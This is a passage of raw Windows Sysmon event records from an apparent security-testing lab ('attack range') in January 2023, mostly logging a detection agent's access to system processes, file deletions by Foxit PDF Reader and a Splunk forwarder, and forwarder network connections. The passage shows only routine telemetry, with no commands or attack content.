Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045022Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.824{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045021Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.822{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045020Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.815{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045019Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.803{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045018Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.780{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045017Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.774{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045016Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.764{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000045015Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.761{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=2C27A05FFC6EBD71EB2D568A907F1010,SHA256=4C236EBB24193CC7D75B7B59B0E7F03952E88FDCC976DFC8DB6C8B55DC657DF0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045014Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.760{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\ADMINI~1\AppData\Local\Temp\etilqs_6AlQqb3parYcKYoMD5=8D16CB0257457703A2EC4E082419E7F1,SHA256=9CDFF8DCD74DE284F4CF5C191A3248F8E660DD3676CB92EEB33D153840DFA805,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045013Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.758{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045012Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.756{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045011Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.754{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045010Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.751{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000045009Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.749{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=0EDDE85D591F2BE3254FB3FB02B00CFD,SHA256=12E541F683559D15D60FC3C78C440195424FE49A42CD3B1DDCEE63293F21FDA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045008Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.749{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045007Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.748{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045006Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.745{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045005Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.744{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045004Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.743{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045003Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.742{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045002Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.740{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045001Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.302{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045000Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.233{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044999Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.232{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000045031Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:35.987{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9CE61D11BFB86D6DE506BF1D888CB30,SHA256=9AA0F9B26866DCEF23959BFB83C022BBB37DDDB2C388D012279E6A4770904B56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017511Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:35.378{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E322B6EDA273B6F014253EF12750BE1,SHA256=9FF103D36FB0D9C04DE7DDD9F2AE1B60A72B4D772E1CAA40976DBBE3EA6E6A35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017510Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:35.094{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91D1ADA3D64EB4B0FAD49ADAABAF8CC7,SHA256=7A817D22441DAD822770B278FDB7B245D40864A6284C4A12F0EDDAEF0EEAF8E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045030Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:35.589{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=DEA14FC5070B0BF4F2525D2CB0062234,SHA256=3D5B5583A337A917D93E9EF1DCFBDEED9F1132DABD5456C20200E22560DFB05D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045029Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:35.573{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=8691EB0754E150EF84544DF8050309CB,SHA256=408A038B1227AF54A779CD5ED0EC9E4EFAA7259D14DE271A313C6836FB8BC330,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017512Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:36.203{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A041EDA30A3505C4F89BDF81D5CDF4C4,SHA256=105ED62F1AA5715633EF0B2CA84A26119A0F2CE60058F833CA50971D0AD66119,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045032Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.546{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56408-false10.0.1.12-8000- 354300x800000000000000017514Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:35.127{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50138-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017513Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:37.287{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0426C86C10E46C26B265DDE4CBFD4A64,SHA256=000B20C436BD7E2B3E61C2A9D2692D96199250088EF0042C52C86483AF4E6291,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045033Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:37.092{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F0234A98CB9E053EC05A01218EF8471,SHA256=295E7BE9DB312282AF77589307184BBD5E7923B5D023B02D815FCEFA3BF47F7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017515Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:38.377{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=322C32BDA699B1DEEE117EA79555A8A4,SHA256=160A524D52EBC172FEC6CBCD2F608B556325770C7DC21CF017AB9E6B9B9A47EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045034Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:38.193{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 